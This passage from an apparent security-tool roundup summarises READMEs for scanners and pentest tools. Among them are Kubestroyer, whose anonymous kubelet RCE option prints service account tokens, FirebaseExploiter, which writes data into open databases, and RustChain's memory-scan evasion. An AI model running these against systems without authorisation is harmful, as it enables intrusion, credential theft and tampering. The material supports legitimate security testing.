    Gold Digger will recursively go through all folders and files in search of content matching items listed in the gold.json file. Additionally, you can leverage an exclusion file called exclusions.json for skipping files matching specific extensions. Provide the root folder as the --directory flag.

    An example structure could be:

    ~/Engagements/CustomerName/data/randomfiles/
    ~/Engagements/CustomerName/data/randomfiles2/
    ~/Engagements/CustomerName/data/code/

    You would provide the following command to parse all 3 account reports:

    python dig.py --gold gold.json --exclude exclusions.json --directory ~/Engagements/CustomerName/data/ --log Customer_2022-123_gold.log

    Results

    The tool will create a log file containg the scanning results. Due to the nature of using regular expressions, there may be numerous false positives. Despite this, the tool has been proven to increase productivity when processing thousands of files.

    Shout-outs

    Shout out to @d1vious for releasing git-wild-hunt https://github.com/d1vious/git-wild-hunt! Most of the regex in GoldDigger was used from this amazing project.



    Artemis - A Modular Web Reconnaissance Tool And Vulnerability Scanner

    By: Zion3R


    A modular web reconnaissance tool and vulnerability scanner based on Karton (https://github.com/CERT-Polska/karton).

    The Artemis project has been initiated by the KN Cyber science club of Warsaw University of Technology and is currently being maintained by CERT Polska.

    Artemis is experimental software, under active development - use at your own risk.

    Features

    For an up-to-date list of features, please refer to the documentation.

    Development

    Tests

    To run the tests, use:

    ./scripts/test

    Code formatting

    Artemis uses pre-commit to run linters and format the code. pre-commit is executed on CI to verify that the code is formatted properly.

    To run it locally, use:

    pre-commit run --all-files

    To setup pre-commit so that it runs before each commit, use:

    pre-commit install

    Building the docs

    To build the documentation, use:

    cd docs
    python3 -m venv venv
    . venv/bin/activate
    pip install -r requirements.txt
    make html

    How do I write my own module?

    Please refer to the documentation.

    Contributing

    Contributions are welcome! We will appreciate both ideas for new Artemis modules (added as GitHub issues) as well as pull requests with new modules or code improvements.

    However obvious it may seem we kindly remind you that by contributing to Artemis you agree that the BSD 3-Clause License shall apply to your input automatically, without the need for any additional declarations to be made.



    Scanner-and-Patcher - A Web Vulnerability Scanner And Patcher

    By: Zion3R


    This tools is very helpful for finding vulnerabilities present in the Web Applications.

    • A web application scanner explores a web application by crawling through its web pages and examines it for security vulnerabilities, which involves generation of malicious inputs and evaluation of application's responses.
      • These scanners are automated tools that scan web applications to look for security vulnerabilities. They test web applications for common security problems such as cross-site scripting (XSS), SQL injection, and cross-site request forgery (CSRF).
      • This scanner uses different tools like nmap, dnswalk, dnsrecon, dnsenum, dnsmap etc in order to scan ports, sites, hosts and network to find vulnerabilites like OpenSSL CCS Injection, Slowloris, Denial of Service, etc.

    Tools Used

    Serial No. Tool Name Serial No. Tool Name
    1 whatweb 2 nmap
    3 golismero 4 host
    5 wget 6 uniscan
    7 wafw00f 8 dirb
    9 davtest 10 theharvester
    11 xsser 12 fierce
    13 dnswalk 14 dnsrecon
    15 dnsenum 16 dnsmap
    17 dmitry 18 nikto
    19 whois 20 lbd
    21 wapiti 22 devtest
    23 sslyze

    Working

    Phase 1

    • User has to write:- "python3 web_scan.py (https or http) ://example.com"
    • At first program will note initial time of running, then it will make url with "www.example.com".
    • After this step system will check the internet connection using ping.
    • Functionalities:-
      • To navigate to helper menu write this command:- --help for update --update
      • If user want to skip current scan/test:- CTRL+C
      • To quit the scanner use:- CTRL+Z
      • The program will tell scanning time taken by the tool for a specific test.

    Phase 2

    • From here the main function of scanner will start:
    • The scanner will automatically select any tool to start scanning.
    • Scanners that will be used and filename rotation (default: enabled (1)
    • Command that is used to initiate the tool (with parameters and extra params) already given in code
    • After founding vulnerability in web application scanner will classify vulnerability in specific format:-
      • [Responses + Severity (c - critical | h - high | m - medium | l - low | i - informational) + Reference for Vulnerability Definition and Remediation]
      • Here c or critical defines most vulnerability wheres l or low is for least vulnerable system

    Definitions:-

    • Critical:- Vulnerabilities that score in the critical range usually have most of the following characteristics: Exploitation of the vulnerability likely results in root-level compromise of servers or infrastructure devices.Exploitation is usually straightforward, in the sense that the attacker does not need any special authentication credentials or knowledge about individual victims, and does not need to persuade a target user, for example via social engineering, into performing any special functions.

    • High:- An attacker can fully compromise the confidentiality, integrity or availability, of a target system without specialized access, user interaction or circumstances that are beyond the attackerโ€™s control. Very likely to allow lateral movement and escalation of attack to other systems on the internal network of the vulnerable application. The vulnerability is difficult to exploit. Exploitation could result in elevated privileges. Exploitation could result in a significant data loss or downtime.

    • Medium:- An attacker can partially compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attackerโ€™s control may be required for an attack to succeed. Very likely to be used in conjunction with other vulnerabilities to escalate an attack.Vulnerabilities that require the attacker to manipulate individual victims via social engineering tactics. Denial of service vulnerabilities that are difficult to set up. Exploits that require an attacker to reside on the same local network as the victim. Vulnerabilities where exploitation provides only very limited access. Vulnerabilities that require user privileges for successful exploitation.

    • Low:- An attacker has limited scope to compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attackerโ€™s control is required for an attack to succeed. Needs to be used in conjunction with other vulnerabilities to escalate an attack.

    • Info:- An attacker can obtain information about the web site. This is not necessarily a vulnerability, but any information which an attacker obtains might be used to more accurately craft an attack at a later date. Recommended to restrict as far as possible any information disclosure.

    • CVSS V3 SCORE RANGE SEVERITY IN ADVISORY
      0.1 - 3.9 Low
      4.0 - 6.9 Medium
      7.0 - 8.9 High
      9.0 - 10.0 Critical

    Vulnerabilities

    • After this scanner will show results which inclues:
      • Response time
      • Total time for scanning
      • Class of vulnerability

    Remediation

    • Now, Scanner will tell about harmful effects of that specific type vulnerabilility.
    • Scanner tell about sources to know more about the vulnerabilities. (websites).
    • After this step, scanner suggests some remdies to overcome the vulnerabilites.

    Phase 3

    • Scanner will Generate a proper report including
      • Total number of vulnerabilities scanned
      • Total number of vulnerabilities skipped
      • Total number of vulnerabilities detected
      • Time taken for total scan
      • Details about each and every vulnerabilites.
    • Writing all scan files output into SA-Debug-ScanLog for debugging purposes under the same directory
    • For Debugging Purposes, You can view the complete output generated by all the tools named SA-Debug-ScanLog.

    Use

    Use Program as python3 web_scan.py (https or http) ://example.com
    --help
    --update
    Serial No. Vulnerabilities to Scan Serial No. Vulnerabilities to Scan
    1 IPv6 2 Wordpress
    3 SiteMap/Robot.txt 4 Firewall
    5 Slowloris Denial of Service 6 HEARTBLEED
    7 POODLE 8 OpenSSL CCS Injection
    9 FREAK 10 Firewall
    11 LOGJAM 12 FTP Service
    13 STUXNET 14 Telnet Service
    15 LOG4j 16 Stress Tests
    17 WebDAV 18 LFI, RFI or RCE.
    19 XSS, SQLi, BSQL 20 XSS Header not present
    21 Shellshock Bug 22 Leaks Internal IP
    23 HTTP PUT DEL Methods 24 MS10-070
    25 Outdated 26 CGI Directories
    27 Interesting Files 28 Injectable Paths
    29 Subdomains 30 MS-SQL DB Service
    31 ORACLE DB Service 32 MySQL DB Service
    33 RDP Server over UDP and TCP 34 SNMP Service
    35 Elmah 36 SMB Ports over TCP and UDP
    37 IIS WebDAV 38 X-XSS Protection

    Installation

    git clone https://github.com/Malwareman007/Scanner-and-Patcher.git
    cd Scanner-and-Patcher/setup
    python3 -m pip install --no-cache-dir -r requirements.txt

    Screenshots of Scanner

    Contributions

    Template contributions , Feature Requests and Bug Reports are more than welcome.

    Authors

    GitHub: @Malwareman007
    GitHub: @Riya73
    GitHub:@nano-bot01

    Contributing

    Contributions, issues and feature requests are welcome!
    Feel free to check issues page.



    Kubestroyer - Kubernetes Exploitation Tool

    By: Zion3R

    Kubestroyer

    Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests


    About The Project

    Kubestroyer is a Golang exploitation tool that aims to take advantage of Kubernetes clusters misconfigurations.

    The tool is scanning known Kubernetes ports that can be exposed as well as exploiting them.

    Getting Started

    To get a local copy up and running, follow these simple example steps.

    Prerequisites

    • Go 1.19
      wget https://go.dev/dl/go1.19.4.linux-amd64.tar.gz
      tar -C /usr/local -xzf go1.19.4.linux-amd64.tar.gz

    Installation

    Use prebuilt binary

    or

    Using go install command :

    $ go install github.com/Rolix44/Kubestroyer@latest

    or

    build from source:

    1. Clone the repo
      $ git clone https://github.com/Rolix44/Kubestroyer.git
    2. build the binary
      $ go build -o Kubestroyer cmd/kubestroyer/main.go 

    Usage

    Parameter Description Mand/opt Example
    -t / --target Target (IP, domain or file) Mandatory -t localhost,127.0.0.1 / -t ./domain.txt
    --node-scan Enable node port scanning (port 30000 to 32767) Optionnal -t localhost --node-scan
    --anon-rce RCE using Kubelet API anonymous auth Optionnal -t localhost --anon-rce
    -x Command to execute when using RCE (display service account token by default) Optionnal -t localhost --anon-rce -x "ls -al"

    Currently supported features

    • Target

      • List of multiple targets
      • Input file as target
    • Scanning

      • Known ports scan
      • Node port scan (30000 to 32767)
      • Port description
    • Vulnerabilities

      • Annon RCE on Kubelet
        • Choose command to execute

    Roadmap

    • Choose the pod for anon RCE
    • Etcd exploit
    • Kubelet read-only API parsing for information disclosure

    See the open issues for a full list of proposed features (and known issues).

    Contributing

    Contributions are what make the open source community such an amazing place to learn, inspire, and create. Any contributions you make are greatly appreciated.

    If you have a suggestion that would make this better, please fork the repo and create a pull request. You can also simply open an issue with the tag "enhancement". Don't forget to give the project a star! Thanks again!

    1. Fork the Project
    2. Create your Feature Branch (git checkout -b feature/AmazingFeature)
    3. Commit your Changes (git commit -m 'Add some AmazingFeature')
    4. Push to the Branch (git push origin feature/AmazingFeature)
    5. Open a Pull Request

    License

    Distributed under the MIT License. See LICENSE.txt for more information.

    Contact

    Rolix - @Rolix_cy - rolixcy@protonmail.com

    Project Link: https://github.com/Rolix44/Kubestroyer



    Burp-Dom-Scanner - Burp Suite's Extension To Scan And Crawl Single Page Applications

    By: Zion3R


    It's a Burp Suite's extension to allow for recursive crawling and scanning of Single Page Applications.
    It runs a Chromium browser to scan the webpage for DOM-based XSS.
    It can also collect all the requests (XHR, fetch, websockets, etc) issued during the crawling allowing them to be forwarded to Burp's Proxy, Repeater and Intruder.

    It requires node and DOMDig.


    Download

    Latest release can be downloaded here

    Installation

    1. Install node
    2. Install DOMDig
    3. Download and load the extension
    4. Set both the path of node's executable and the path of domdig.js in the extension's UI.

    Scanning Engine

    Burp DOM Scanner uses DOMDig as the crawling and scanning engine.

    DOMDig

    DOMDig is a DOM XSS scanner that runs inside the Chromium web browser and it can scan single page applications (SPA) recursively. Unlike other scanners, DOMDig can crawl any webapplication (including gmail) by keeping track of DOM modifications and XHR/fetch/websocket requests and it can simulate a real user interaction by firing events. During this process, XSS payloads are put into input fields and their execution is tracked in order to find injection points and the related URL modifications.

    Usage and Details

    Details about usage, performed checks and reported vulnerabilities, can be found at DOMDig's page



    RustChain - Hide Memory Artifacts Using ROP And Hardware Breakpoints

    By: Zion3R


    This tool is a simple PoC of how to hide memory artifacts using a ROP chain in combination with hardware breakpoints. The ROP chain will change the main module memory page's protections to N/A while sleeping (i.e. when the function Sleep is called). For more detailed information about this memory scanning evasion technique check out the original project Gargoyle. x64 only.

    The idea is to set up a hardware breakpoint in kernel32!Sleep and a new top-level filter to handle the exception. When Sleep is called, the exception filter function set before is triggered, allowing us to call the ROP chain without the need of using classic function hooks. This way, we avoid leaving weird and unusual private memory regions in the process related to well known dlls.

    The ROP chain simply calls VirtualProtect() to set the current memory page to N/A, then calls SleepEx and finally restores the RX memory protection.


    The overview of the process is as follows:

    • We use SetUnhandledExceptionFilter to set a new exception filter function.
    • SetThreadContext is used in order to set a hardware breakpoint on kernel32!Sleep.
    • We call Sleep, triggering the hardware breakpoint and driving the execution flow towards our exception filter function.
    • The ROP chain is called from the exception filter function, allowing to change the current memory page protection to N/A. Then SleepEx is called. Finally, the ROP chain restores the RX memory protection and the normal execution continues.

    This process repeats indefinitely.

    As it can be seen in the image, the main module's memory protection is changed to N/A while sleeping, which avoids memory scans looking for pages with execution permission.

    Compilation

    Since we are using LITCRYPT plugin to obfuscate string literals, it is required to set up the environment variable LITCRYPT_ENCRYPT_KEY before compiling the code:

    C:\Users\User\Desktop\RustChain> set LITCRYPT_ENCRYPT_KEY="yoursupersecretkey"

    After that, simply compile the code and run the tool:

    C:\Users\User\Desktop\RustChain> cargo build
    C:\Users\User\Desktop\RustChain\target\debug> rustchain.exe

    Limitations

    This tool is just a PoC and some extra features should be implemented in order to be fully functional. The main purpose of the project was to learn how to implement a ROP chain and integrate it within Rust. Because of that, this tool will only work if you use it as it is, and failures are expected if you try to use it in other ways (for example, compiling it to a dll and trying to reflectively load and execute it).

    Credits



    Kubei - A Flexible Kubernetes Runtime Scanner


    Kubei is a vulnerabilities scanning tool that allows users to get an accurate and immediate risk assessment of their kubernetes clusters. Kubei scans all images that are being used in a Kubernetes cluster, including images of application pods and system pods. It doesnโ€™t scan the entire image registries and doesnโ€™t require preliminary integration with CI/CD pipelines.
    It is a configurable tool which allows users to define the scope of the scan (target namespaces), the speed, and the vulnerabilities level of interest.
    It provides a graphical UI which allows the viewer to identify where and what should be replaced, in order to mitigate the discovered vulnerabilities.

    Prerequisites
    1. A Kubernetes cluster is ready, and kubeconfig ( ~/.kube/config) is properly configured for the target cluster.

    Required permissions
    1. Read secrets in cluster scope. This is required for getting image pull secrets for scanning private image repositories.
    2. List pods in cluster scope. This is required for calculating the target pods that need to be scanned.
    3. Create jobs in cluster scope. This is required for creating the jobs that will scan the target pods in their namespaces.

    Configurations
    The file deploy/kubei.yaml is used to deploy and configure Kubei on your cluster.
    1. Set the scan scope. Set the IGNORE_NAMESPACES env variable to ignore specific namespaces. Set TARGET_NAMESPACE to scan a specific namespace, or leave empty to scan all namespaces.
    2. Set the scan speed. Expedite scanning by running parallel scanners. Set the MAX_PARALLELISM env variable for the maximum number of simultaneous scanners.
    3. Set severity level threshold. Vulnerabilities with severity level higher than or equal to SEVERITY_THRESHOLD threshold will be reported. Supported levels are Unknown, Negligible, Low, Medium, High, Critical, Defcon1. Default is Medium.
    4. Set the delete job policy. Set the DELETE_JOB_POLICY env variable to define whether or not to delete completed scanner jobs. Supported values are:
      • All - All jobs will be deleted.
      • Successful - Only successful jobs will be deleted (default).
      • Never - Jobs will never be deleted.

    Usage
    1. Run the following command to deploy Kubei on the cluster:
      kubectl apply -f https://raw.githubusercontent.com/Portshift/kubei/master/deploy/kubei.yaml
    2. Run the following command to verify that Kubei is up and running:
      kubectl -n kubei get pod -lapp=kubei
    3. Then, port forwarding into the Kubei webapp via the following command:
      kubectl -n kubei port-forward $(kubectl -n kubei get pods -lapp=kubei -o jsonpath='{.items[0].metadata.name}') 8080
    4. In your browser, navigate to http://localhost:8080/view/ , and then click 'GO' to run a scan.
    5. To check the state of Kubei, and the progress of ongoing scans, run the following command:
      kubectl -n kubei logs $(kubectl -n kubei get pods -lapp=kubei -o jsonpath='{.items[0].metadata.name}')
    6. Refresh the page (http://localhost:8080/view/) to update the results.


    Running Kubei with an external HTTP/HTTPS proxy
    Uncomment and configure the proxy env variables for the Clair and Kubei deployments in deploy/kubei.yaml.

    Limitations
    1. Supports Kubernetes Image Manifest V 2, Schema 2 (https://docs.docker.com/registry/spec/manifest-v2-2/). It will fail to scan on earlier versions.
    2. The CVE database will update once a day.


    FirebaseExploiter - Vulnerability Discovery Tool That Discovers Firebase Database Which Are Open And Can Be Exploitable


    FirebaseExploiter is a vulnerability discovery tool that discovers Firebase Database which are open and can be exploitable. Primarily built for mass hunting bug bounties and for penetration testing.

    Features

    • Mass vulnerability scanning from list of hosts
    • Custom JSON data in exploit.json to upload during exploit
    • Custom URI path for exploit

    Usage

    This will display help for the CLI tool. Here are all the required arguments it supports.

    Installation

    FirebaseExploiter was built using go1.19. Make sure you use latest version of Go to install successfully. Run the following command to install the latest version:

    go install -v github.com/securebinary/firebaseExploiter@latest

    Running FirebaseExploiter

    To scan a specific domain to check for Insecure Firebase DB.

    To exploit a Firebase DB to write your own JSON document in it.

    Create your own exploit.json file in proper JSON format to exploit vulnerable Firebase DBs.

    Checking the exploited URL to verify the vulnerability.

    Adding custom path for exploiting Firebase DBs.

    Mass scanning for Insecure Firebase Databases from list of target hosts.

    Exploiting vulnerable Firebase DBs from the list of target hosts.

    License

    FirebaseExploiter is made with love by the SecureBinary team. Any tweaks / community contribution are welcome.


    PortEx - Java Library To Analyse Portable Executable Files With A Special Focus On Malware Analysis And PE Malformation Robustness


    PortEx is a Java library for static malware analysis of Portable Executable files. Its focus is on PE malformation robustness, and anomaly detection. PortEx is written in Java and Scala, and targeted at Java applications.

    Features

    • Reading header information from: MSDOS Header, COFF File Header, Optional Header, Section Table
    • Reading PE structures: Imports, Resources, Exports, Debug Directory, Relocations, Delay Load Imports, Bound Imports
    • Dumping of sections, resources, overlay, embedded ZIP, JAR or .class files
    • Scanning for file format anomalies, including structural anomalies, deprecated, reserved, wrong or non-default values.
    • Visualize PE file structure, local entropies and byteplot of the file with variable colors and sizes
    • Calculate Shannon Entropy and Chi Squared for files and sections
    • Calculate ImpHash and Rich and RichPV hash values for files and sections
    • Parse RichHeader and verify checksum
    • Calculate and verify Optional Header checksum
    • Scan for PEiD signatures, internal file type signatures or your own signature database
    • Scan for Jar to EXE wrapper (e.g. exe4j, jsmooth, jar2exe, launch4j)
    • Extract Unicode and ASCII strings contained in the file
    • Extraction and conversion of .ICO files from icons in the resource section
    • Extraction of version information and manifest from the file
    • Reading .NET metadata and streams (Alpha)

    For more information have a look at PortEx Wiki and the Documentation

    PortexAnalyzer CLI and GUI

    PortexAnalyzer CLI is a command line tool that runs the library PortEx under the hood. If you are looking for a readily compiled command line PE scanner to analyse files with it, download it from here PortexAnalyzer.jar

    The GUI version is available here: PortexAnalyzerGUI

    Using PortEx

    Including PortEx to a Maven Project

    You can include PortEx to your project by adding the following Maven dependency:

    <dependency>
    <groupId>com.github.katjahahn</groupId>
    <artifactId>portex_2.12</artifactId>
    <version>4.0.0</version>
    </dependency>

    To use a local build, add the library as follows:

    <dependency>
    <groupId>com.github.katjahahn</groupId>
    <artifactId>portex_2.12</artifactId>
    <version>4.0.0</version>
    <scope>system</scope>
    <systemPath>$PORTEXDIR/target/scala-2.12/portex_2.12-4.0.0.jar</systemPath>
    </dependency>

    Including PortEx to an SBT project

    Add the dependency as follows in your build.sbt

    libraryDependencies += "com.github.katjahahn" % "portex_2.12" % "4.0.0"

    Building PortEx

    Requirements

    PortEx is build with sbt

    Compile and Build With sbt

    To simply compile the project invoke:

    $ sbt compile

    To create a jar:

    $ sbt package

    To compile a fat jar that can be used as command line tool, type:

    $ sbt assembly

    Create Eclipse Project

    You can create an eclipse project by using the sbteclipse plugin. Add the following line to project/plugins.sbt:

    addSbtPlugin("com.typesafe.sbteclipse" % "sbteclipse-plugin" % "2.4.0")

    Generate the project files for Eclipse:

    $ sbt eclipse

    Import the project to Eclipse via the Import Wizard.

    Donations

    I develop PortEx and PortexAnalyzer as a hobby in my freetime. If you like it, please consider buying me a coffee: https://ko-fi.com/struppigel

    Author

    Karsten Hahn

    Twitter: @Struppigel

    Mastodon: struppigel@infosec.exchange

    Youtube: MalwareAnalysisForHedgehogs



    KubeStalk - Discovers Kubernetes And Related Infrastructure Based Attack Surface From A Black-Box Perspective

    ย 


    KubeStalk is a tool to discover Kubernetes and related infrastructure based attack surface from a black-box perspective. This tool is a community version of the tool used to probe for unsecured Kubernetes clusters around the internet during Project Resonance - Wave 9.


    Usage

    The GIF below demonstrates usage of the tool:


    Installation

    KubeStalk is written in Python and requires the requests library.

    To install the tool, you can clone the repository to any directory:

    git clone https://github.com/redhuntlabs/kubestalk

    Once cloned, you need to install the requests library using python3 -m pip install requests or:

    python3 -m pip install -r requirements.txt

    Everything is setup and you can use the tool directly.

    Command-line Arguments

    A list of command line arguments supported by the tool can be displayed using the -h flag.

    $ python3 kubestalk.py  -h

    +---------------------+
    | K U B E S T A L K |
    +---------------------+ v0.1

    [!] KubeStalk by RedHunt Labs - A Modern Attack Surface (ASM) Management Company
    [!] Author: 0xInfection (RHL Research Team)
    [!] Continuously Track Your Attack Surface using https://redhuntlabs.com/nvadr.

    usage: ./kubestalk.py <url(s)>/<cidr>

    Required Arguments:
    urls List of hosts to scan

    Optional Arguments:
    -o OUTPUT, --output OUTPUT
    Output path to write the CSV file to
    -f SIG_FILE, --sig-dir SIG_FILE
    Signature directory path to load
    -t TIMEOUT, --timeout TIMEOUT
    HTTP timeout value in seconds
    -ua USER_AGENT, --user-agent USER_AGENT
    User agent header t o set in HTTP requests
    --concurrency CONCURRENCY
    No. of hosts to process simultaneously
    --verify-ssl Verify SSL certificates
    --version Display the version of KubeStalk and exit.

    Basic Usage

    To use the tool, you can pass one or more hosts to the script. All targets passed to the tool must be RFC 3986 complaint, i.e. must contain a scheme and hostname (and port if required).

    A basic usage is as below:

    $ python3 kubestalk.py https://โ–ˆโ–ˆโ–ˆ.โ–ˆโ–ˆ.โ–ˆโ–ˆ.โ–ˆโ–ˆโ–ˆ:10250

    +---------------------+
    | K U B E S T A L K |
    +---------------------+ v0.1

    [!] KubeStalk by RedHunt Labs - A Modern Attack Surface (ASM) Management Company
    [!] Author: 0xInfection (RHL Research Team)
    [!] Continuously Track Your Attack Surface using https://redhuntlabs.com/nvadr.

    [+] Loaded 10 signatures to scan.
    [*] Processing host: https://โ–ˆโ–ˆโ–ˆ.โ–ˆโ–ˆ.โ–ˆโ–ˆ.โ–ˆโ–ˆ:10250
    [!] Found potential issue on https://โ–ˆโ–ˆโ–ˆ.โ–ˆโ–ˆ.โ–ˆโ–ˆ.โ–ˆโ–ˆ:10250: Kubernetes Pod List Exposure
    [*] Writing results to output file.
    [+] Done.

    HTTP Tuning

    HTTP requests can be fine-tuned using the -t (to mention HTTP timeouts), -ua (to specify custom user agents) and the --verify-ssl (to validate SSL certificates while making requests).

    Concurrency

    You can control the number of hosts to scan simultanously using the --concurrency flag. The default value is set to 5.

    Output

    The output is written to a CSV filea and can be controlled by the --output flag.

    A sample of the CSV output rendered in markdown is as belows:

    host path issue type severity
    https://โ–ˆ.โ–ˆ.โ–ˆ.โ–ˆ:10250 /pods Kubernetes Pod List Exposure core-component vulnerability/misconfiguration
    https://โ–ˆ.โ–ˆ.โ–ˆ.โ–ˆ:443 /api/v1/pods Kubernetes Pod List Exposure core-component vulnerability/misconfiguration
    http://โ–ˆ.โ–ˆ.โ–ˆโ–ˆ.โ–ˆ:80 / etcd Viewer Dashboard Exposure add-on vulnerability/exposure
    http://โ–ˆโ–ˆ.โ–ˆโ–ˆ.โ–ˆ.โ–ˆ:80 / cAdvisor Metrics Web UI Dashboard Exposure add-on vulnerability/exposure

    Version & License

    The tool is licensed under the BSD 3 Clause License and is currently at v0.1.

    To know more about our Attack Surface Management platform, check out NVADR.



    Nuclearpond - A Utility Leveraging Nuclei To Perform Internet Wide Scans For The Cost Of A Cup Of Coffee


    Nuclear Pond is used to leverage Nuclei in the cloud with unremarkable speed, flexibility, and perform internet wide scans for far less than a cup of coffee.

    It leverages AWS Lambda as a backend to invoke Nuclei scans in parallel, choice of storing json findings in s3 to query with AWS Athena, and is easily one of the cheapest ways you can execute scans in the cloud.


    Features

    • Output results to your terminal, json, or to S3
    • Specify threads and parallel invocations in any desired number of batches
    • Specify any Nuclei arguments just like you would locally
    • Specify a single host or from a file
    • Run the http server to take scans from the API
    • Run the http server to get status of the scans
    • Query findings through Athena for searching S3
    • Specify a custom nuclei and reporting configurations

    Usage

    Think of Nuclear Pond as just a way for you to run Nuclei in the cloud. You can use it just as you would on your local machine but run them in parallel and with however many hosts you want to specify. All you need to think of is the nuclei command line flags you wish to pass to it.

    Setup & Installation

    To install Nuclear Pond, you need to configure the backend terraform module. You can do this by running terraform apply or by leveraging terragrunt.

    $ go install github.com/DevSecOpsDocs/nuclearpond@latest

    Environment Variables

    You can either pass in your backend with flags or through environment variables. You can use -f or --function-name to specify your Lambda function and -r or --region to the specified region. Below are environment variables you can use.

    • AWS_LAMBDA_FUNCTION_NAME is the name of your lambda function to execute the scans on
    • AWS_REGION is the region your resources are deployed
    • NUCLEARPOND_API_KEY is the API key for authenticating to the API
    • AWS_DYNAMODB_TABLE is the dynamodb table to store API scan states

    Command line flags

    Below are some of the flags you can specify when running nuclearpond. The primary flags you need are -t or -l for your target(s), -a for the nuclei args, and -o to specify your output. When specifying Nuclei args you must pass them in as base64 encoded strings by performing -a $(echo -ne "-t dns" | base64).

    Commands

    Below are the subcommands you can execute within nuclearpond.

    • run: Execute nuclei scans
    • service: Basic API to execute nuclei scans

    Run

    To run nuclearpond subcommand nuclearpond run -t devsecopsdocs.com -r us-east-1 -f jwalker-nuclei-runner-function -a $(echo -ne "-t dns" | base64) -o cmd -b 1 in which the target is devsecopsdocs.com, region is us-east-1, lambda function name is jwalker-nuclei-runner-function, nuclei arguments are -t dns, output is cmd, and executes one function through a batch of one host through -b 1.

    $ nuclearpond run -h
    Executes nuclei tasks in parallel by invoking lambda asynchronously

    Usage:
    nuclearpond run [flags]

    Flags:
    -a, --args string nuclei arguments as base64 encoded string
    -b, --batch-size int batch size for number of targets per execution (default 1)
    -f, --function-name string AWS Lambda function name
    -h, --help help for run
    -o, --output string output type to save nuclei results(s3, cmd, or json) (default "cmd")
    -r, --region string AWS region to run nuclei
    -s, --silent silent command line output
    -t, --target string individual target to specify
    -l, --targets string list of targets in a file
    -c, --threads int number of threads to run lambda funct ions, default is 1 which will be slow (default 1)

    Custom Templates

    The terraform module by default downloads the templates on execution as well as adds the templates as a layer. The variables to download templates use the terraform github provider to download the release zip. The folder name within the zip will be located within /opt. Since Nuclei downloads them on run we do not have to but to improve performance you can specify -t /opt/nuclei-templates-9.3.4/dns to execute templates from the downloaded zip. To specify your own templates you must reference a release. When doing so on your own repository you must specify these variables in the terraf orm module, github_token is not required if your repository is public.

    • github_repository
    • github_owner
    • release_tag
    • github_token

    Retrieving Findings

    If you have specified s3 as the output, your findings will be located in S3. The fastest way to get at them is to do so with Athena. Assuming you setup the terraform-module as your backend, all you need to do is query them directly through athena. You may have to configure query results if you have not done so already.

    select
    *
    from
    nuclei_db.findings_db
    limit 10;

    Advance Query

    In order to get down into queries a little deeper, I thought I would give you a quick example. In the select statement we drill down into info column, "matched-at" column must be in double quotes due to - character, and you are searching only for high and critical findings generated by Nuclei.

    SELECT
    info.name,
    host,
    type,
    info.severity,
    "matched-at",
    info.description,
    template,
    dt
    FROM
    "nuclei_db"."findings_db"
    where
    host like '%devsecopsdocs.com'
    and info.severity in ('high','critical')

    Infrastructure

    The backend infrastructure, all within terraform module. I would strongly recommend reading the readme associated to it as it will have some important notes.

    • Lambda function
    • S3 bucket
      • Stores nuclei binary
      • Stores configuration files
      • Stores findings
    • Glue Database and Table
      • Allows you to query the findings in S3
      • Partitioned by the hour
      • Partition projection
    • IAM Role for Lambda Function


    UDPX - Fast A nd Lightweight, UDPX Is A Single-Packet UDP Scanner Written In Go That Supports The Discovery Of Over 45 Services With The Ability To Add Custom Ones


    Fast and lightweight, UDPX is a single-packet UDP scanner written in Go that supports the discovery of over 45 services with the ability to add custom ones. It is easy to use and portable, and can be run on Linux, Mac OS, and Windows. Unlike internet-wide scanners like zgrab2 and zmap, UDPX is designed for portability and ease of use.

    • It is fast. It can scan whole /16 network in ~20 seconds for a single service.
    • You don't need to instal libpcap or any other dependencies.
    • Can run on Linux, Mac Os, Windows. Or your Nethunter if you built it for Arm.
    • Customizable. You can add your probes and test for even more protocols.
    • Stores results in JSONL format.
    • Scans also domain names.

    How it works

    Scanning UDP ports is very different than scanning TCP - you may, or may not get any result back from probing an UDP port as UDP is a connectionless protocol. UDPX implements a single-packet based approach. A protocol-specific packet is sent to the defined service (port) and waits for a response. The limit is set to 500 ms by default and can be changed by -w flag. If the service sends a packet back within this time, it is certain that it is indeed listening on that port and is reported as open.

    A typical technique is to send 0 byte UDP packets to each port on the target machine. If we receive an "ICMP Port Unreachable" message, then the port is closed. If an UDP response is received to the probe (unusual), the port is open. If we get no response at all, the state is open or filtered, meaning that the port is either open or packet filters are blocking the communication. This method is not implemented as there is no added value (UDPX tests only for specific protocols).

    Usage

    Concurrency: By default, concurrency is set to 32 connections only (so you don't crash anything). If you have a lot of hosts to scan, you can set it to 128 or 256 connections. Based on your hardware, connection stability, and ulimit (on *nix), you can run 512 or more concurrent connections, but this is not recommended.

    To scan a single IP:

    udpx -t 1.1.1.1

    To scan a CIDR with maximum of 128 connections and timeout of 1000 ms:

    udpx -t 1.2.3.4/24 -c 128 -w 1000

    To scan targets from file with maximum of 128 connections for only specific service:

    udpx -tf targets.txt -c 128 -s ipmi

    Target can be:

    • IP address
    • CIDR
    • Domain

    IPv6 is supported.

    If you want to store the results, use flag -o [filename]. Output is in JSONL format, as can be seen bellow:

    {"address":"45.33.32.156","hostname":"scanme.nmap.org","port":123,"service":"ntp","response_data":"JAME6QAAAEoAAA56LU9vp+d2ZPwOYIyDxU8jS3GxUvM="}

    Options


    __ ______ ____ _ __
    / / / / __ \/ __ \ |/ /
    / / / / / / / /_/ / /
    / /_/ / /_/ / ____/ |
    \____/_____/_/ /_/|_|
    v1.0.2-beta, by @nullt3r

    Usage of ./udpx-linux-amd64:
    -c int
    Maximum number of concurrent connections (default 32)
    -nr
    Do not randomize addresses
    -o string
    Output file to write results
    -s string
    Scan only for a specific service, one of: ard, bacnet, bacnet_rpm, chargen, citrix, coap, db, db, digi1, digi2, digi3, dns, ipmi, ldap, mdns, memcache, mssql, nat_port_mapping, natpmp, netbios, netis, ntp, ntp_monlist, openvpn, pca_nq, pca_st, pcanywhere, portmap, qotd, rdp, ripv, sentinel, sip, snmp1, snmp2, snmp3, ssdp, tftp, ubiquiti, ubiquiti_discovery_v1, ubiquiti_discovery_v2, upnp, valve, wdbrpc, wsd, wsd_malformed, xdmcp, kerberos, ike
    -sp
    Show received packets (only first 32 bytes)
    -t string
    IP/CIDR to scan
    -tf string
    File containing IPs/CIDRs to scan
    -w int
    Maximum time to wait for a response (socket timeout) in ms (default 500)

    Building

